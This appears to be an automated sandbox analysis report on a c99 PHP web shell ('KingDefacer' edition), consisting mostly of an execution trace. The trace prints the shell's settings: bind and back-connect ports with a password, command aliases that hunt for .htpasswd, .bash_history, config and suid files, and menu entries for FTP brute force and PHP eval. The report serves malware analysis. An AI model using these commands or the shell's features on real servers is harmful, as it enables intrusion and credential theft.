PHP Malware Analysis

c99_php7.4.php

md5: ffc1a3b2d5efeb1eea03227f20f0a174

Jump to:

Screenshot


Attributes

Emails

Encoding

Environment

Execution

Files

Input

Title
  • c99shell - Edited By KingDefacer (Original)
  • 500 Internal Server Error (HTML)

URLs


Deobfuscated PHP code

Failed to deobfuscate code

Execution traces

data/traces/ffc1a3b2d5efeb1eea03227f20f0a174_trace-1676260944.6383.xt
Version: 3.1.0beta2
File format: 4
TRACE START [2023-02-13 02:02:50.536146]
1	0	1	0.000258	393528
1	3	0	0.005560	1307120	{main}	1		/var/www/html/uploads/c99_php7.4.php	0	0
2	4	0	0.005596	1307120	ini_set	0		/var/www/html/uploads/c99_php7.4.php	2	2	'error_reporting'	32767
2	4	1	0.005615	1307256
2	4	R			'22527'
2	5	0	0.005629	1307152	ini_set	0		/var/www/html/uploads/c99_php7.4.php	3	2	'display_errors'	1
2	5	1	0.005644	1307224
2	5	R			''
2	6	0	0.005657	1307152	ini_set	0		/var/www/html/uploads/c99_php7.4.php	4	2	'display_startup_errors'	1
2	6	1	0.005671	1307224
2	6	R			''
2	7	0	0.005683	1307152	function_exists	0		/var/www/html/uploads/c99_php7.4.php	6	1	'set_magic_quotes_runtime'
2	7	1	0.005697	1307192
2	7	R			FALSE
2	8	0	0.005711	1307152	function_exists	0		/var/www/html/uploads/c99_php7.4.php	12	1	'ereg'
2	8	1	0.005724	1307192
2	8	R			FALSE
2	9	0	0.005736	1307152	function_exists	0		/var/www/html/uploads/c99_php7.4.php	20	1	'getmicrotime'
2	9	1	0.005749	1307192
2	9	R			FALSE
2	10	0	0.005762	1307152	error_reporting	0		/var/www/html/uploads/c99_php7.4.php	21	1	5
2	10	1	0.005775	1307160
2	10	R			32767
2	11	0	0.005788	1307120	ignore_user_abort	0		/var/www/html/uploads/c99_php7.4.php	22	1	TRUE
2	11	1	0.005801	1307184
2	11	R			0
2	12	0	0.005815	1307152	substr	0		/var/www/html/uploads/c99_php7.4.php	24	3	'Linux'	0	3
2	12	1	0.005829	1307280
2	12	R			'Lin'
2	13	0	0.005842	1307184	strtolower	0		/var/www/html/uploads/c99_php7.4.php	24	1	'Lin'
2	13	1	0.005855	1307248
2	13	R			'lin'
1		A						/var/www/html/uploads/c99_php7.4.php	24	$win = FALSE
2	14	0	0.005882	1307152	getmicrotime	1		/var/www/html/uploads/c99_php7.4.php	25	0
3	15	0	0.005894	1307152	microtime	0		/var/www/html/uploads/c99_php7.4.php	20	0
3	15	1	0.005907	1307200
3	15	R			'0.64405900 1676260944'
3	16	0	0.005920	1307200	explode	0		/var/www/html/uploads/c99_php7.4.php	20	2	' '	'0.64405900 1676260944'
3	16	1	0.005934	1307728
3	16	R			[0 => '0.64405900', 1 => '1676260944']
2		A						/var/www/html/uploads/c99_php7.4.php	20	$usec = '0.64405900'
2		A						/var/www/html/uploads/c99_php7.4.php	20	$sec = '1676260944'
2	14	1	0.005973	1307152
2	14	R			1676260944.6441
2	17	0	0.005987	1307152	define	0		/var/www/html/uploads/c99_php7.4.php	25	2	'starttime'	1676260944.6441
2	17	1	0.006002	1307256
2	17	R			TRUE
2	18	0	0.006014	1307184	get_magic_quotes_gpc	0		/var/www/html/uploads/c99_php7.4.php	26	0
2	18	1	0.006026	1307184
2	18	R			FALSE
2	19	0	0.006039	1307184	array_merge	0		/var/www/html/uploads/c99_php7.4.php	27	3	[]	[]	[]
2	19	1	0.006053	1307304
2	19	R			[]
1		A						/var/www/html/uploads/c99_php7.4.php	27	$_REQUEST_REQUEST = []
1		A						/var/www/html/uploads/c99_php7.4.php	30	$shver = 'KingDefacer'
1		A						/var/www/html/uploads/c99_php7.4.php	34	$surl = NULL
1		A						/var/www/html/uploads/c99_php7.4.php	37	$surl_autofill_include = TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	39	$include = '&'
2	20	0	0.006125	1307184	getenv	0		/var/www/html/uploads/c99_php7.4.php	39	1	'QUERY_STRING'
2	20	1	0.006140	1307248
2	20	R			''
2	21	0	0.006153	1307216	explode	0		/var/www/html/uploads/c99_php7.4.php	39	2	'&'	''
2	21	1	0.006166	1307664
2	21	R			[0 => '']
2	22	0	0.006179	1307560	explode	0		/var/www/html/uploads/c99_php7.4.php	39	2	'='	''
2	22	1	0.006192	1308008
2	22	R			[0 => '']
1		A						/var/www/html/uploads/c99_php7.4.php	39	$v = [0 => '']
2	23	0	0.006217	1307936	urldecode	0		/var/www/html/uploads/c99_php7.4.php	39	1	''
2	23	1	0.006229	1308000
2	23	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	39	$name = ''
2	24	0	0.006252	1307968	urldecode	0		/var/www/html/uploads/c99_php7.4.php	39	1	NULL
2	24	1	0.006264	1308032
2	24	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	39	$value = ''
2	25	0	0.006286	1308000	strpos	0		/var/www/html/uploads/c99_php7.4.php	39	2	''	'http://'
2	25	1	0.006299	1308072
2	25	R			FALSE
2	26	0	0.006312	1308000	strpos	0		/var/www/html/uploads/c99_php7.4.php	39	2	''	'https://'
2	26	1	0.006331	1308072
2	26	R			FALSE
2	27	0	0.006344	1308000	strpos	0		/var/www/html/uploads/c99_php7.4.php	39	2	''	'ssl://'
2	27	1	0.006356	1308072
2	27	R			FALSE
2	28	0	0.006368	1308000	strpos	0		/var/www/html/uploads/c99_php7.4.php	39	2	''	'ftp://'
2	28	1	0.006380	1308072
2	28	R			FALSE
2	29	0	0.006392	1308000	strpos	0		/var/www/html/uploads/c99_php7.4.php	39	2	''	'\\\\'
2	29	1	0.006405	1308072
2	29	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	42	$surl = '?'
2	30	0	0.006430	1307656	htmlspecialchars	0		/var/www/html/uploads/c99_php7.4.php	44	1	'?'
2	30	1	0.006443	1307848
2	30	R			'?'
1		A						/var/www/html/uploads/c99_php7.4.php	44	$surl = '?'
1		A						/var/www/html/uploads/c99_php7.4.php	46	$timelimit = 0
1		A						/var/www/html/uploads/c99_php7.4.php	49	$login = ''
1		A						/var/www/html/uploads/c99_php7.4.php	51	$pass = ''
1		A						/var/www/html/uploads/c99_php7.4.php	52	$md5_pass = ''
1		A						/var/www/html/uploads/c99_php7.4.php	54	$host_allow = [0 => '*']
1		A						/var/www/html/uploads/c99_php7.4.php	55	$login_txt = 'Restricted area'
1		A						/var/www/html/uploads/c99_php7.4.php	56	$accessdeniedmess = '<a href="http://xxxxxxxxxxxxxxxxxxxxxxxx">SpYshell v.KingDefacer</a>: Erisim Engellendi'
1		A						/var/www/html/uploads/c99_php7.4.php	58	$gzipencode = TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	60	$updatenow = FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	62	$ashsh_updateurl = 'http://xxxxxxxxxxxxxxxxxxxxxx'
1		A						/var/www/html/uploads/c99_php7.4.php	63	$ashsh_sourcesurl = 'http://xxxxxxxxxxxxxxxxxxxxxxxx'
1		A						/var/www/html/uploads/c99_php7.4.php	65	$filestealth = TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	67	$donated_html = '<center><b>Powerad By MilitanZ</b></center>'
1		A						/var/www/html/uploads/c99_php7.4.php	71	$donated_act = [0 => '']
1		A						/var/www/html/uploads/c99_php7.4.php	73	$curdir = './'
1		A						/var/www/html/uploads/c99_php7.4.php	75	$tmpdir = ''
1		A						/var/www/html/uploads/c99_php7.4.php	76	$tmpdir_log = './'
1		A						/var/www/html/uploads/c99_php7.4.php	78	$sort_default = '0a'
1		A						/var/www/html/uploads/c99_php7.4.php	79	$sort_save = TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	88	$ftypes = ['html' => [0 => 'html', 1 => 'htm', 2 => 'shtml'], 'txt' => [0 => 'txt', 1 => 'conf', 2 => 'bat', 3 => 'sh', 4 => 'js', 5 => 'bak', 6 => 'doc', 7 => 'log', 8 => 'sfc', 9 => 'cfg', 10 => 'htaccess'], 'exe' => [0 => 'sh', 1 => 'install', 2 => 'bat', 3 => 'cmd'], 'ini' => [0 => 'ini', 1 => 'inf'], 'code' => [0 => 'php', 1 => 'phtml', 2 => 'php3', 3 => 'php4', 4 => 'inc', 5 => 'tcl', 6 => 'h', 7 => 'c', 8 => 'cpp', 9 => 'py', 10 => 'cgi', 11 => 'pl'], 'img' => [0 => 'gif', 1 => 'png', 2 => 'jpeg', 3 => 'jfif', 4 => 'jpg', 5 => 'jpe', 6 => 'bmp', 7 => 'ico', 8 => 'tif', 9 => 'tiff', 10 => 'avi', 11 => 'mpg', 12 => 'mpeg'], 'sdb' => [0 => 'sdb'], 'phpsess' => [0 => 'sess'], 'download' => [0 => 'exe', 1 => 'com', 2 => 'pif', 3 => 'src', 4 => 'lnk', 5 => 'zip', 6 => 'rar', 7 => 'gz', 8 => 'tar']]
2	31	0	0.006730	1307896	getenv	0		/var/www/html/uploads/c99_php7.4.php	106	1	'PHPRC'
2	31	1	0.006743	1307928
2	31	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	106	$exeftypes = [' -q %f%' => [0 => 'php', 1 => 'php3', 2 => 'php4'], 'perl %f%' => [0 => 'pl', 1 => 'cgi']]
2	32	0	0.006775	1308304	basename	0		/var/www/html/uploads/c99_php7.4.php	124	1	'/uploads/c99_php7.4.php'
2	32	1	0.006790	1308376
2	32	R			'c99_php7.4.php'
1		A						/var/www/html/uploads/c99_php7.4.php	124	$regxp_highlight = [0 => [0 => 'c99_php7.4.php', 1 => 1, 2 => '<font color="yellow">', 3 => '</font>'], 1 => [0 => 'config.php', 1 => 1]]
1		A						/var/www/html/uploads/c99_php7.4.php	128	$safemode_diskettes = [0 => 'a']
1		A						/var/www/html/uploads/c99_php7.4.php	131	$hexdump_lines = 8
1		A						/var/www/html/uploads/c99_php7.4.php	132	$hexdump_rows = 24
1		A						/var/www/html/uploads/c99_php7.4.php	134	$nixpwdperpage = 100
1		A						/var/www/html/uploads/c99_php7.4.php	136	$bindport_pass = 'ash'
1		A						/var/www/html/uploads/c99_php7.4.php	137	$bindport_port = '31373'
1		A						/var/www/html/uploads/c99_php7.4.php	138	$bc_port = '31373'
1		A						/var/www/html/uploads/c99_php7.4.php	139	$datapipe_localport = '8081'
1		A						/var/www/html/uploads/c99_php7.4.php	145	$cmdaliases = [0 => [0 => 'Find all suid files', 1 => 'find / -type f -perm -04000 -ls'], 1 => [0 => 'Find all suid files in current directory', 1 => 'find . -type f -perm -04000 -ls'], 2 => [0 => 'Find all sgid files', 1 => 'find / -type f -perm -02000 -ls'], 3 => [0 => 'Find all sgid files in current directory', 1 => 'find . -type f -perm -02000 -ls'], 4 => [0 => 'Find all config.inc.php files', 1 => 'find / -type f -name config.inc.php'], 5 => [0 => 'Find all config* files', 1 => 'find / -type f -name "config*"'], 6 => [0 => 'Find all config* files in current directory', 1 => 'find . -type f -name "config*"'], 7 => [0 => 'Find all writable files', 1 => 'find / -perm -2 -ls'], 8 => [0 => 'Find all files and folders in current directory', 1 => 'find . -perm -2 -ls'], 9 => [0 => 'Find all service.pwd files', 1 => 'find / -type f -name service.pwd'], 10 => [0 => 'Find all service.pwd files in current directory', 1 => 'find . -type f -name service.pwd'], 11 => [0 => 'Find all .htpasswd files', 1 => 'find / -type f -name .htpasswd'], 12 => [0 => 'Find all .htpasswd files in current directory', 1 => 'find . -type f -name .htpasswd'], 13 => [0 => 'Find all .bash_history files', 1 => 'find / -type f -name .bash_history'], 14 => [0 => 'Find all .bash_history files in current directory', 1 => 'find . -type f -name .bash_history'], 15 => [0 => 'Find all .fetchmailrc files', 1 => 'find / -type f -name .fetchmailrc'], 16 => [0 => 'Find all .fetchmailrc files in current directory', 1 => 'find . -type f -name .fetchmailrc'], 17 => [0 => 'Find all Linux second-accessible files', 1 => 'lsattr -va'], 18 => [0 => 'Show All Open Ports.', 1 => 'netstat -an | grep -i listen']]
1		A						/var/www/html/uploads/c99_php7.4.php	174	$sess_cookie = 'ashshvars'
1		A						/var/www/html/uploads/c99_php7.4.php	176	$usefsbuff = TRUE
1		A						/var/www/html/uploads/c99_php7.4.php	177	$copy_unset = FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	181	$quicklaunch = [0 => [0 => '<img src="?act=img&img=home" alt="Ana Sayfa" height="20" width="20" border="0">', 1 => '?'], 1 => [0 => '<img src="?act=img&img=back" alt="Geri" height="20" width="20" border="0">', 1 => '#" onclick="history.back(1)'], 2 => [0 => '<img src="?act=img&img=forward" alt="Ileri" height="20" width="20" border="0">', 1 => '#" onclick="history.go(1)'], 3 => [0 => '<img src="?act=img&img=up" alt="Yukari" height="20" width="20" border="0">', 1 => '?act=ls&d=%upd&sort=%sort'], 4 => [0 => '<img src="?act=img&img=refresh" alt="Yenile" height="20" width="17" border="0">', 1 => ''], 5 => [0 => '<img src="?act=img&img=search" alt="Arama" height="20" width="20" border="0">', 1 => '?act=search&d=%d'], 6 => [0 => '<img src="?act=img&img=buffer" alt="Tampon" height="20" width="20" border="0">', 1 => '?act=fsbuff&d=%d'], 7 => [0 => '<b>Cyriptos</b>', 1 => '?act=encoder&d=%d'], 8 => [0 => '<b>Vehicles</b>', 1 => '?act=tools&d=%d'], 9 => [0 => '<b>Process.</b>', 1 => '?act=processes&d=%d'], 10 => [0 => '<b>FTP brute</b>', 1 => '?act=ftpquickbrute&d=%d'], 11 => [0 => '<b>Security</b>', 1 => '?act=security&d=%d'], 12 => [0 => '<b>SQL</b>', 1 => '?act=sql&d=%d'], 13 => [0 => '<b>PHP-code</b>', 1 => '?act=eval&d=%d'], 14 => [0 => '<b>Notification</b>', 1 => '?act=feedback&d=%d'], 15 => [0 => '<b>Destroy</b>', 1 => '?act=selfremove'], 16 => [0 => '<b>Exit</b>', 1 => '#" onclick="if (confirm(\'Are you sure dude?\')) window.close()']]
1		A						/var/www/html/uploads/c99_php7.4.php	201	$highlight_background = '#c0c0c0'
1		A						/var/www/html/uploads/c99_php7.4.php	202	$highlight_bg = '#FFFFFF'
1		A						/var/www/html/uploads/c99_php7.4.php	203	$highlight_comment = '#6A6A6A'
1		A						/var/www/html/uploads/c99_php7.4.php	204	$highlight_default = '#0000BB'
1		A						/var/www/html/uploads/c99_php7.4.php	205	$highlight_html = '#1300FF'
1		A						/var/www/html/uploads/c99_php7.4.php	206	$highlight_keyword = '#007700'
1		A						/var/www/html/uploads/c99_php7.4.php	207	$highlight_string = '#000000'
1		A						/var/www/html/uploads/c99_php7.4.php	209	$f = NULL
2	33	0	0.007136	1318128	extract	0		/var/www/html/uploads/c99_php7.4.php	210	1	NULL
2	33	1	0.007152	1318160
2	33	R			NULL
2	34	0	0.007165	1318128	set_time_limit	0		/var/www/html/uploads/c99_php7.4.php	216	1	0
2	34	1	0.007181	1318192
2	34	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	217	$tmp = []
1		A						/var/www/html/uploads/c99_php7.4.php	218	$k = 0
2	35	0	0.007215	1317784	preg_quote	0		/var/www/html/uploads/c99_php7.4.php	218	1	'*'
2	35	1	0.007228	1317856
2	35	R			'\\*'
2	36	0	0.007241	1317824	str_replace	0		/var/www/html/uploads/c99_php7.4.php	218	3	'\\*'	'.*'	'\\*'
2	36	1	0.007256	1317952
2	36	R			'.*'
1		A						/var/www/html/uploads/c99_php7.4.php	218	$tmp[] = '.*'
2	37	0	0.007280	1318192	implode	0		/var/www/html/uploads/c99_php7.4.php	219	2	'|'	[0 => '.*']
2	37	1	0.007294	1318256
2	37	R			'.*'
1		A						/var/www/html/uploads/c99_php7.4.php	219	$s = '!^(.*)$!i'
2	38	0	0.007318	1318232	getenv	0		/var/www/html/uploads/c99_php7.4.php	220	1	'REMOTE_ADDR'
2	38	1	0.007331	1318304
2	38	R			'127.0.0.1'
2	39	0	0.007344	1318272	preg_match	0		/var/www/html/uploads/c99_php7.4.php	220	2	'!^(.*)$!i'	'127.0.0.1'
2	39	1	0.007360	1318336
2	39	R			1
2	40	0	0.007374	1318232	realpath	0		/var/www/html/uploads/c99_php7.4.php	234	1	'.'
2	40	1	0.007390	1318312
2	40	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	234	$lastdir = '/var/www/html/uploads'
2	41	0	0.007416	1318280	chdir	0		/var/www/html/uploads/c99_php7.4.php	235	1	'./'
2	41	1	0.007432	1318368
2	41	R			TRUE
2	42	0	0.007446	1318328	unserialize	0		/var/www/html/uploads/c99_php7.4.php	237	1	NULL
2	42	1	0.007460	1318376
2	42	R			FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	237	$sess_data = FALSE
1		A						/var/www/html/uploads/c99_php7.4.php	238	$sess_data = []
1		A						/var/www/html/uploads/c99_php7.4.php	239	$sess_data['copy'] = []
1		A						/var/www/html/uploads/c99_php7.4.php	240	$sess_data['cut'] = []
2	43	0	0.007517	1318704	ini_get	0		/var/www/html/uploads/c99_php7.4.php	242	1	'disable_functions'
2	43	1	0.007530	1319184
2	43	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/c99_php7.4.php	242	$disablefunc = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2	44	0	0.007576	1319152	str_replace	0		/var/www/html/uploads/c99_php7.4.php	245	3	' '	''	'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2	44	1	0.007601	1319248
2	44	R			'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
1		A						/var/www/html/uploads/c99_php7.4.php	245	$disablefunc = 'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2	45	0	0.007643	1319152	explode	0		/var/www/html/uploads/c99_php7.4.php	246	2	','	'pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,'
2	45	1	0.007665	1321624
2	45	R			[0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
1		A						/var/www/html/uploads/c99_php7.4.php	246	$disablefunc = [0 => 'pcntl_alarm', 1 => 'pcntl_fork', 2 => 'pcntl_waitpid', 3 => 'pcntl_wait', 4 => 'pcntl_wifexited', 5 => 'pcntl_wifstopped', 6 => 'pcntl_wifsignaled', 7 => 'pcntl_wifcontinued', 8 => 'pcntl_wexitstatus', 9 => 'pcntl_wtermsig', 10 => 'pcntl_wstopsig', 11 => 'pcntl_signal', 12 => 'pcntl_signal_get_handler', 13 => 'pcntl_signal_dispatch', 14 => 'pcntl_get_last_error', 15 => 'pcntl_strerror', 16 => 'pcntl_sigprocmask', 17 => 'pcntl_sigwaitinfo', 18 => 'pcntl_sigtimedwait', 19 => 'pcntl_exec', 20 => 'pcntl_getpriority', 21 => 'pcntl_setpriority', 22 => 'pcntl_async_signals', 23 => '']
2	46	0	0.007730	1321104	function_exists	0		/var/www/html/uploads/c99_php7.4.php	249	1	'ash_buff_prepare'
2	46	1	0.007743	1321144
2	46	R			FALSE
2	47	0	0.007756	1321104	ash_buff_prepare	1		/var/www/html/uploads/c99_php7.4.php	265	0
3	48	0	0.007769	1321152	array_unique	0		/var/www/html/uploads/c99_php7.4.php	257	1	[]
3	48	1	0.007782	1321184
3	48	R			[]
2		A						/var/www/html/uploads/c99_php7.4.php	257	$sess_data['copy'] = []
3	49	0	0.007806	1321152	array_unique	0		/var/www/html/uploads/c99_php7.4.php	258	1	[]
3	49	1	0.007818	1321184
3	49	R			[]
2		A						/var/www/html/uploads/c99_php7.4.php	258	$sess_data['cut'] = []
3	50	0	0.007841	1321176	sort	0		/var/www/html/uploads/c99_php7.4.php	259	1	[]
3	50	1	0.007853	1321264
3	50	R			TRUE
3	51	0	0.007903	1321256	sort	0		/var/www/html/uploads/c99_php7.4.php	260	1	[]
3	51	1	0.007917	1321344
3	51	R			TRUE
2	47	1	0.007930	1321288
2	52	0	0.007937	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	266	1	'ash_sess_put'
2	52	1	0.007950	1321328
2	52	R			FALSE
2	53	0	0.007966	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	288	1	'str2mini'
2	53	1	0.007980	1321328
2	53	R			FALSE
2	54	0	0.007993	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	300	1	'view_size'
2	54	1	0.008005	1321328
2	54	R			FALSE
2	55	0	0.008018	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	315	1	'fs_copy_dir'
2	55	1	0.008031	1321328
2	55	R			FALSE
2	56	0	0.008043	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	335	1	'fs_copy_obj'
2	56	1	0.008056	1321328
2	56	R			FALSE
2	57	0	0.008069	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	352	1	'fs_move_dir'
2	57	1	0.008081	1321328
2	57	R			FALSE
2	58	0	0.008093	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	372	1	'fs_move_obj'
2	58	1	0.008105	1321328
2	58	R			FALSE
2	59	0	0.008118	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	392	1	'fs_rmdir'
2	59	1	0.008130	1321328
2	59	R			FALSE
2	60	0	0.008142	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	410	1	'fs_rmobj'
2	60	1	0.008155	1321328
2	60	R			FALSE
2	61	0	0.008167	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	424	1	'myshellexec'
2	61	1	0.008179	1321328
2	61	R			FALSE
2	62	0	0.008191	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	446	1	'tabsort'
2	62	1	0.008203	1321328
2	62	R			FALSE
2	63	0	0.008215	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	447	1	'view_perms'
2	63	1	0.008228	1321328
2	63	R			FALSE
2	64	0	0.008240	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	477	1	'posix_getpwuid'
2	64	1	0.008252	1321328
2	64	R			TRUE
2	65	0	0.008269	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	478	1	'posix_getgrgid'
2	65	1	0.008282	1321328
2	65	R			TRUE
2	66	0	0.008294	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	479	1	'posix_kill'
2	66	1	0.008306	1321328
2	66	R			TRUE
2	67	0	0.008319	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	480	1	'parse_perms'
2	67	1	0.008331	1321328
2	67	R			FALSE
2	68	0	0.008344	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	498	1	'parsesort'
2	68	1	0.008356	1321328
2	68	R			FALSE
2	69	0	0.008368	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	508	1	'view_perms_color'
2	69	1	0.008381	1321328
2	69	R			FALSE
2	70	0	0.008393	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	517	1	'ashgetsource'
2	70	1	0.008406	1321328
2	70	R			FALSE
2	71	0	0.008418	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	535	1	'ashsh_getupdate'
2	71	1	0.008431	1321328
2	71	R			FALSE
2	72	0	0.008443	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	571	1	'mysql_dump'
2	72	1	0.008460	1321328
2	72	R			FALSE
2	73	0	0.008473	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	656	1	'mysql_buildwhere'
2	73	1	0.008486	1321328
2	73	R			FALSE
2	74	0	0.008498	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	674	1	'mysql_fetch_all'
2	74	1	0.008511	1321328
2	74	R			FALSE
2	75	0	0.008523	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	686	1	'mysql_smarterror'
2	75	1	0.008535	1321328
2	75	R			FALSE
2	76	0	0.008548	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	696	1	'mysql_query_form'
2	76	1	0.008560	1321328
2	76	R			FALSE
2	77	0	0.008572	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	716	1	'mysql_create_db'
2	77	1	0.008585	1321328
2	77	R			FALSE
2	78	0	0.008597	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	725	1	'mysql_query_parse'
2	78	1	0.008609	1321328
2	78	R			FALSE
2	79	0	0.008621	1321288	function_exists	0		/var/www/html/uploads/c99_php7.4.php	771	1	'ashfsearch'
2	79	1	0.008633	1321328
2	79	R			FALSE
2	80	0	0.008646	1321288	ob_start	0		/var/www/html/uploads/c99_php7.4.php	819	0
2	80	1	0.008658	1337800
2	80	R			TRUE
2	81	0	0.008671	1337800	ob_implicit_flush	0		/var/www/html/uploads/c99_php7.4.php	820	1	0
2	81	1	0.008683	1337832
2	81	R			NULL
2	82	0	0.008696	1337800	header	0		/var/www/html/uploads/c99_php7.4.php	838	1	'Zamani: Mon, 12 May 2005 03:00:00 GMT'
2	82	1	0.008713	1337912
2	82	R			NULL
2	83	0	0.008726	1337880	gmdate	0		/var/www/html/uploads/c99_php7.4.php	839	1	'D, d M Y H:i:s'
2	83	1	0.008742	1338168
2	83	R			'Mon, 13 Feb 2023 04:02:24'
2	84	0	0.008756	1337960	header	0		/var/www/html/uploads/c99_php7.4.php	839	1	'Son Modifiye: Mon, 13 Feb 2023 04:02:24 GMT'
2	84	1	0.008772	1338080
2	84	R			NULL
2	85	0	0.008784	1337968	header	0		/var/www/html/uploads/c99_php7.4.php	840	1	'Cache-Control: no-store, no-cache, must-revalidate'
2	85	1	0.008799	1338096
2	85	R			NULL
2	86	0	0.008812	1338064	header	0		/var/www/html/uploads/c99_php7.4.php	841	2	'Cache-Control: post-check=0, pre-check=0'	FALSE
2	86	1	0.008828	1338216
2	86	R			NULL
2	87	0	0.008840	1338152	header	0		/var/www/html/uploads/c99_php7.4.php	842	1	'Pratik: no-cache'
2	87	1	0.008855	1338248
2	87	R			NULL
2	88	0	0.008867	1338216	ini_get	0		/var/www/html/uploads/c99_php7.4.php	845	1	'upload_tmp_dir'
2	88	1	0.008881	1338248
2	88	R			''
1		A						/var/www/html/uploads/c99_php7.4.php	845	$tmpdir = ''
2	89	0	0.008904	1338216	is_dir	0		/var/www/html/uploads/c99_php7.4.php	846	1	''
2	89	1	0.008916	1338256
2	89	R			FALSE
2	90	0	0.008928	1338216	realpath	0		/var/www/html/uploads/c99_php7.4.php	848	1	''
2	90	1	0.008943	1338296
2	90	R			'/var/www/html/uploads'
1		A						/var/www/html/uploads/c99_php7.4.php	848	$tmpdir = '/var/www/html/uploads'
2	91	0	0.008968	1338264	str_replace	0		/var/www/html/uploads/c99_php7.4.php	849	3	'\\'	'/'	'/var/www/html/uploads'
